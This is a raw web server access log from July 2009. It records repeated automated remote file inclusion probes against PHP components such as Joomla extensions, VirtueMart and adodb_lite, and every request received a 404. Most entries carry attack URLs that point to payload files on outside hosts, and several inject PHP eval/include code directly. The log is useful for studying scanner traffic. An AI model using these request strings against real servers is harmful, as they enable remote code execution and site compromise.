195.137.160.12 - - [03/Jul/2009:16:24:08 +0000] "GET /logs/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 353
195.137.160.12 - - [03/Jul/2009:16:24:08 +0000] "GET /logs/access_log/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 364
195.137.160.12 - - [03/Jul/2009:16:24:13 +0000] "GET /administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 348
195.137.160.12 - - [03/Jul/2009:16:29:11 +0000] "GET /logs/access_log%20%20/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.walkingdoll.co.kr/ttf/fx29id1.txt??? HTTP/1.1" 404 366
61.78.62.84 - - [03/Jul/2009:16:30:55 +0000] "GET //setup.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 287
61.78.62.84 - - [03/Jul/2009:16:30:55 +0000] "GET /logs/access_log//setup.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 303
61.78.62.84 - - [03/Jul/2009:16:30:55 +0000] "GET /logs//setup.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 292
61.78.62.84 - - [03/Jul/2009:16:30:55 +0000] "GET /logs//setup.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 292
61.78.62.84 - - [03/Jul/2009:16:30:55 +0000] "GET //setup.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 287
61.78.62.84 - - [03/Jul/2009:16:30:55 +0000] "GET /logs/access_log//setup.php?dir=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 303
125.248.150.52 - - [03/Jul/2009:16:34:55 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 318
211.245.23.158 - - [03/Jul/2009:16:36:32 +0000] "GET /logs/access_log//include/admin.lib.inc.php?site_path=http://www.saeronam.or.kr/~srn/bbs/data/saessac_n/id.txt?? HTTP/1.1" 404 319
211.245.23.158 - - [03/Jul/2009:16:36:32 +0000] "GET /logs//include/admin.lib.inc.php?site_path=http://www.saeronam.or.kr/~srn/bbs/data/saessac_n/id.txt?? HTTP/1.1" 404 308
211.245.23.158 - - [03/Jul/2009:16:36:32 +0000] "GET //include/admin.lib.inc.php?site_path=http://www.saeronam.or.kr/~srn/bbs/data/saessac_n/id.txt?? HTTP/1.1" 404 303
89.223.3.98 - - [03/Jul/2009:16:46:56 +0000] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 303
89.223.3.98 - - [03/Jul/2009:16:46:56 +0000] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 308
89.223.3.98 - - [03/Jul/2009:16:46:56 +0000] "GET /logs/access_log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 321
89.223.3.98 - - [03/Jul/2009:16:47:05 +0000] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 303
89.223.3.98 - - [03/Jul/2009:16:47:05 +0000] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 308
89.223.3.98 - - [03/Jul/2009:16:47:06 +0000] "GET /logs/access_log%20%20//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 321
72.14.199.85 - - [03/Jul/2009:16:49:16 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
125.248.150.52 - - [03/Jul/2009:16:50:46 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 318
89.223.3.98 - - [03/Jul/2009:16:54:41 +0000] "GET /logs/access_log//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.stormpages.com/gugug/id1_kate.txt? HTTP/1.1" 404 319
190.144.44.36 - - [03/Jul/2009:17:03:37 +0000] "GET /logs//public/displayCategory.php?adminpath=http://www.freewebtown.com/fucku6/fx29id1.txt?? HTTP/1.1" 404 309
190.144.44.36 - - [03/Jul/2009:17:03:37 +0000] "GET //public/displayCategory.php?adminpath=http://www.freewebtown.com/fucku6/fx29id1.txt?? HTTP/1.1" 404 304
190.144.44.36 - - [03/Jul/2009:17:03:37 +0000] "GET /logs/access_log%20%20//public/displayCategory.php?adminpath=http://www.freewebtown.com/fucku6/fx29id1.txt?? HTTP/1.1" 404 322
190.144.44.36 - - [03/Jul/2009:17:06:10 +0000] "GET /logs/access_log//public/displayCategory.php?adminpath=http://www.freewebtown.com/fucku6/fx29id1.txt?? HTTP/1.1" 404 320
123.143.98.5 - - [03/Jul/2009:17:12:14 +0000] "GET //administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 351
123.143.98.5 - - [03/Jul/2009:17:12:14 +0000] "GET /logs/access_log//administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 367
123.143.98.5 - - [03/Jul/2009:17:12:14 +0000] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 356
123.143.98.5 - - [03/Jul/2009:17:12:16 +0000] "GET //administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 351
123.143.98.5 - - [03/Jul/2009:17:12:16 +0000] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 356
123.143.98.5 - - [03/Jul/2009:17:12:16 +0000] "GET /logs/access_log//administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 367
123.143.98.5 - - [03/Jul/2009:17:14:34 +0000] "GET /logs/access_log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 369
123.143.98.5 - - [03/Jul/2009:17:14:35 +0000] "GET /logs/access_log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 369
125.248.150.52 - - [03/Jul/2009:17:19:50 +0000] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 356
125.248.150.52 - - [03/Jul/2009:17:19:50 +0000] "GET //administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 351
125.248.150.52 - - [03/Jul/2009:17:19:50 +0000] "GET /logs/access_log//administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 367
123.143.98.5 - - [03/Jul/2009:17:23:15 +0000] "GET /logs/access_log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 334
123.143.98.5 - - [03/Jul/2009:17:23:15 +0000] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 323
123.143.98.5 - - [03/Jul/2009:17:23:15 +0000] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 318
123.143.98.5 - - [03/Jul/2009:17:23:16 +0000] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 323
123.143.98.5 - - [03/Jul/2009:17:23:16 +0000] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 318
123.143.98.5 - - [03/Jul/2009:17:23:16 +0000] "GET /logs/access_log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 334
125.248.150.52 - - [03/Jul/2009:17:24:41 +0000] "GET /logs/access_log%20%20//administrator/components/com_dbquery/classes/DBQ/admin/variable.class.php?mosConfig_absolute_path=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 369
123.143.98.5 - - [03/Jul/2009:17:26:41 +0000] "GET /logs/access_log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 336
123.143.98.5 - - [03/Jul/2009:17:27:00 +0000] "GET /logs/access_log%20%20//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://styrovit.ru/includes/idxx.txt??? HTTP/1.1" 404 336
61.78.62.84 - - [03/Jul/2009:17:31:00 +0000] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 318
61.78.62.84 - - [03/Jul/2009:17:31:00 +0000] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 323
61.78.62.84 - - [03/Jul/2009:17:31:00 +0000] "GET /logs/access_log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 334
61.78.62.84 - - [03/Jul/2009:17:31:08 +0000] "GET /logs//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 323
61.78.62.84 - - [03/Jul/2009:17:31:08 +0000] "GET /logs/access_log//lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 334
61.78.62.84 - - [03/Jul/2009:17:31:08 +0000] "GET //lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.bwdi.or.kr/bbs/idrose.txt??? HTTP/1.1" 404 318
89.186.1.54 - - [03/Jul/2009:17:31:18 +0000] "GET /http://www.pcheadachefix.com/idx? HTTP/1.1" 404 309
72.14.199.85 - - [03/Jul/2009:17:49:29 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
209.51.133.202 - - [03/Jul/2009:17:57:03 +0000] "GET ///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 350
209.51.133.202 - - [03/Jul/2009:17:57:03 +0000] "GET /logs///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 355
209.51.133.202 - - [03/Jul/2009:17:57:03 +0000] "GET /logs/access_log///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 366
209.51.133.202 - - [03/Jul/2009:17:58:02 +0000] "GET /logs/access_log%20%20///administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://siam2.com/ict/news/photo/.photo/bot/1.swf?? HTTP/1.1" 404 368
87.118.116.55 - - [03/Jul/2009:18:06:58 +0000] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://r0x.beepworld.it/files/file/id1.txt??? HTTP/1.1" 404 312
87.118.116.55 - - [03/Jul/2009:18:06:58 +0000] "GET //bbs//skin/zero_vote/error.php?dir=http://r0x.beepworld.it/files/file/id1.txt??? HTTP/1.1" 404 307
87.118.116.55 - - [03/Jul/2009:18:06:58 +0000] "GET /logs/access_log%20%20//bbs//skin/zero_vote/error.php?dir=http://r0x.beepworld.it/files/file/id1.txt??? HTTP/1.1" 404 325
87.118.116.55 - - [03/Jul/2009:18:20:49 +0000] "GET /logs/access_log//bbs//skin/zero_vote/error.php?dir=http://r0x.beepworld.it/files/file/id1.txt??? HTTP/1.1" 404 323
77.221.130.17 - - [03/Jul/2009:18:30:21 +0000] "GET //config.inc.php?config[root_dir]=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 292
77.221.130.17 - - [03/Jul/2009:18:30:21 +0000] "GET /logs/access_log%20%20//config.inc.php?config[root_dir]=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 310
77.221.130.17 - - [03/Jul/2009:18:30:21 +0000] "GET /logs//config.inc.php?config[root_dir]=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 297
66.71.241.146 - - [03/Jul/2009:18:38:52 +0000] "GET //bbs//skin/zero_vote/error.php?dir=http://unstableovine.net/.know/ido.txt???%0D?? HTTP/1.1" 404 307
66.71.241.146 - - [03/Jul/2009:18:38:52 +0000] "GET /logs/access_log//bbs//skin/zero_vote/error.php?dir=http://unstableovine.net/.know/ido.txt???%0D?? HTTP/1.1" 404 323
66.71.241.146 - - [03/Jul/2009:18:38:52 +0000] "GET /logs//bbs//skin/zero_vote/error.php?dir=http://unstableovine.net/.know/ido.txt???%0D?? HTTP/1.1" 404 312
94.229.66.202 - - [03/Jul/2009:18:45:29 +0000] "GET /logs/access_log/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 333
94.229.66.202 - - [03/Jul/2009:18:45:32 +0000] "GET /logs/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 322
94.229.66.202 - - [03/Jul/2009:18:45:32 +0000] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.thebalvenie.com/files/id.txt??? HTTP/1.1" 404 317
77.221.130.17 - - [03/Jul/2009:18:47:58 +0000] "GET /logs/access_log//config.inc.php?config[root_dir]=http://www.keycallback-store.com//images/idfx1.txt? HTTP/1.1" 404 308
72.14.199.85 - - [03/Jul/2009:18:49:34 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
211.43.202.66 - - [03/Jul/2009:18:53:52 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 347
211.43.202.66 - - [03/Jul/2009:18:53:52 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 331
211.43.202.66 - - [03/Jul/2009:18:53:52 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 336
211.43.202.66 - - [03/Jul/2009:18:53:58 +0000] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 331
211.43.202.66 - - [03/Jul/2009:18:53:58 +0000] "GET /logs//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 336
211.43.202.66 - - [03/Jul/2009:18:53:58 +0000] "GET /logs/access_log//contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.neoeffect.co.kr/board//include/fid.txt?? HTTP/1.1" 404 347
216.117.128.143 - - [03/Jul/2009:19:01:40 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
216.117.128.143 - - [03/Jul/2009:19:01:40 +0000] "GET /logs/access_log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 314
216.117.128.143 - - [03/Jul/2009:19:01:40 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
207.58.155.223 - - [03/Jul/2009:19:05:09 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 328
207.58.155.223 - - [03/Jul/2009:19:05:09 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 333
207.58.155.223 - - [03/Jul/2009:19:05:09 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 344
61.109.245.179 - - [03/Jul/2009:19:09:52 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 333
61.109.245.179 - - [03/Jul/2009:19:09:52 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 328
61.109.245.179 - - [03/Jul/2009:19:09:53 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 344
85.214.78.119 - - [03/Jul/2009:19:24:11 +0000] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 343
85.214.78.119 - - [03/Jul/2009:19:24:11 +0000] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 348
85.214.78.119 - - [03/Jul/2009:19:24:14 +0000] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 348
85.214.78.119 - - [03/Jul/2009:19:24:14 +0000] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://pushkinhouse.readershp.com/zeroboard/data/2_qna1/test.txt?? HTTP/1.1" 404 343
207.58.155.223 - - [03/Jul/2009:19:25:13 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 328
207.58.155.223 - - [03/Jul/2009:19:25:13 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 344
207.58.155.223 - - [03/Jul/2009:19:25:13 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 333
207.58.155.223 - - [03/Jul/2009:19:28:54 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 346
218.38.29.124 - - [03/Jul/2009:19:31:00 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 333
218.38.29.124 - - [03/Jul/2009:19:31:07 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 328
218.38.29.124 - - [03/Jul/2009:19:31:10 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://sunandsea.co.kr/upload/ManieZ.jpg???? HTTP/1.1" 404 344
89.186.1.54 - - [03/Jul/2009:19:31:36 +0000] "GET /logs/access_log/http://www.pcheadachefix.com/idx? HTTP/1.1" 404 325
89.186.1.54 - - [03/Jul/2009:19:31:36 +0000] "GET /logs/access_log/http://www.pcheadachefix.com/idx? HTTP/1.1" 404 325
89.186.1.54 - - [03/Jul/2009:19:31:36 +0000] "GET /http://www.pcheadachefix.com/idx? HTTP/1.1" 404 309
89.186.1.54 - - [03/Jul/2009:19:31:36 +0000] "GET /http://www.pcheadachefix.com/idx? HTTP/1.1" 404 309
89.186.1.54 - - [03/Jul/2009:19:31:36 +0000] "GET /logs/http://www.pcheadachefix.com/idx? HTTP/1.1" 404 314
89.186.1.54 - - [03/Jul/2009:19:31:36 +0000] "GET /logs/http://www.pcheadachefix.com/idx? HTTP/1.1" 404 314
89.186.1.54 - - [03/Jul/2009:19:33:16 +0000] "GET /http://www.pcheadachefix.com/idx? HTTP/1.1" 404 309
89.186.1.54 - - [03/Jul/2009:19:33:16 +0000] "GET /http://www.pcheadachefix.com/idx? HTTP/1.1" 404 309
216.117.128.143 - - [03/Jul/2009:19:34:59 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
216.117.128.143 - - [03/Jul/2009:19:35:00 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
216.117.128.143 - - [03/Jul/2009:19:35:00 +0000] "GET /logs/access_log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 314
89.186.1.54 - - [03/Jul/2009:19:37:26 +0000] "GET /http://www.pcheadachefix.com/idx? HTTP/1.1" 404 309
216.117.128.143 - - [03/Jul/2009:19:39:42 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
216.117.128.143 - - [03/Jul/2009:19:39:42 +0000] "GET /logs/access_log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 314
216.117.128.143 - - [03/Jul/2009:19:39:42 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
216.117.128.143 - - [03/Jul/2009:19:40:08 +0000] "GET /vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 298
216.117.128.143 - - [03/Jul/2009:19:40:08 +0000] "GET /logs/access_log/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 314
216.117.128.143 - - [03/Jul/2009:19:40:08 +0000] "GET /logs/vwar/convert/mvcw.php?step=1&vwar_root=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 303
216.117.128.143 - - [03/Jul/2009:19:49:08 +0000] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 295
216.117.128.143 - - [03/Jul/2009:19:49:08 +0000] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 300
216.117.128.143 - - [03/Jul/2009:19:49:09 +0000] "GET /logs/access_log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 311
216.117.128.143 - - [03/Jul/2009:19:49:27 +0000] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 300
216.117.128.143 - - [03/Jul/2009:19:49:29 +0000] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 295
216.117.128.143 - - [03/Jul/2009:19:49:30 +0000] "GET /logs/access_log%20%20//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.kusa-knu.com/skin/latest/random/lolid1.txt? HTTP/1.1" 404 313
72.14.199.85 - - [03/Jul/2009:19:49:45 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
207.58.155.223 - - [03/Jul/2009:19:53:21 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 328
207.58.155.223 - - [03/Jul/2009:19:53:21 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 333
207.58.155.223 - - [03/Jul/2009:19:53:21 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.jitkavirag.com/wp-content/plugins/dm-albums/template/fx29id.txt?? HTTP/1.1" 404 344
122.153.218.5 - - [03/Jul/2009:19:53:45 +0000] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 287
122.153.218.5 - - [03/Jul/2009:19:53:45 +0000] "GET /logs/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 292
122.153.218.5 - - [03/Jul/2009:19:53:46 +0000] "GET /logs/access_log/kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.pinoy.ae/media/fx29id.txt? HTTP/1.1" 404 303
87.118.116.72 - - [03/Jul/2009:19:53:53 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 344
87.118.116.72 - - [03/Jul/2009:19:53:53 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 344
87.118.116.72 - - [03/Jul/2009:19:53:53 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.akiraselfservice.com/fotos/idev.txt%0D?? HTTP/1.1" 404 328
